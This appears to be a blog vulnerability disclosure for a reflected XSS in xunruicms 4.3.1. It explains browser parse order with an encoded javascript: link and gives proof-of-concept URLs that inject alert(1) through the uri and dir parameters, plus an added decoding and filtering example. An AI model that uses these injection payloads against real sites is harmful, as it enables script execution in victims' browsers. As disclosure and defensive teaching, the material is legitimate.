xunruicms 4.3.1 xss
Description
url : index.php?m=s404&uri=llfam
The URL we visit is passed as a parameter to the function dr_pc_or_mobile(), but the single quote ' is URL-encoded before it gets there.
How to exploit? First, we should learn how the browser's parsers work.
ref : http://bobao.360.cn/learning/detail/292.html
Example
Browser parsers: HTML, URL, JavaScript
- Parse order: html -> url -> javascript
<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">llfam</a>
html parser
// before: javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)
// after : unchanged (the attribute value contains no character references to decode)
url parser
// before: javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)
// after : javascript:\u0061\u006c\u0065\u0072\u0074(1)   (percent-decoded)
javascript parser
// before: \u0061\u006c\u0065\u0072\u0074(1)
// after : alert(1)   (unicode escapes resolved, then executed)
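To make the parse order concrete, here is an added example (not from the original post or from xunruicms) that runs an href through the three decoders in browser order and shows why a filter must canonicalize before inspecting; the names htmlDecode, urlDecode, jsDecode, canonicalizeHref, naiveFilter and rejectsHref are my own, and the HTML decoder covers only a minimal subset of character references.

```javascript
// Added example (not from the original post or from xunruicms): run an href
// through the three browser parsers in order (HTML -> URL -> JavaScript) so a
// filter inspects what will actually execute, not the encoded surface form.

// Stage 1: the HTML parser decodes character references in attribute values.
// Minimal subset (a few named, plus decimal and hex references), not a full decoder.
function htmlDecode(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s.replace(/&(#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi, (m, _, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    return named[name.toLowerCase()] || m;
  });
}

// Stage 2: the URL parser percent-decodes the body of a javascript: URL.
function urlDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; } // malformed %xx left as-is
}

// Stage 3: the JavaScript parser resolves \uXXXX and \xXX escapes in the source.
function jsDecode(s) {
  return s.replace(/\\u([0-9a-f]{4})|\\x([0-9a-f]{2})/gi,
    (m, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Apply the parsers in browser order; returns each intermediate form and the
// script the JS engine would finally see (null when it is not a javascript: URL).
function canonicalizeHref(href) {
  const afterHtml = htmlDecode(href);
  const m = /^\s*javascript:([\s\S]*)$/i.exec(afterHtml);
  if (!m) return { afterHtml, afterUrl: afterHtml, script: null };
  const afterUrl = 'javascript:' + urlDecode(m[1]);
  return { afterHtml, afterUrl, script: jsDecode(afterUrl.slice('javascript:'.length)) };
}

// A filter that only looks at the raw attribute value: misses the payload.
function naiveFilter(href) {
  return /alert|'/i.test(href);
}

// A filter that canonicalizes first: rejects any javascript: URL, whatever the encoding.
function rejectsHref(href) {
  return canonicalizeHref(href).script !== null;
}

// Constructed input: the href from the example above.
const ENCODED_HREF = 'javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)';
```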
PoC
Here, the parsing order is the same as in the example above.
url : index.php?m=s404&uri=llfam%27)%3balert(1)%3balert(%272
The vulnerable code is in header.html, so …
http://cms.test/index.php?c=category&id=llfam&dir=llfam%27)%3balert(1)%3balert(%272
But it is hard to exploit.
Author: ll
Link: http://yoursite.com/2019/09/09/xunruicms_4.3.1_xss/
License: Creative Commons Attribution-NonCommercial 4.0 International License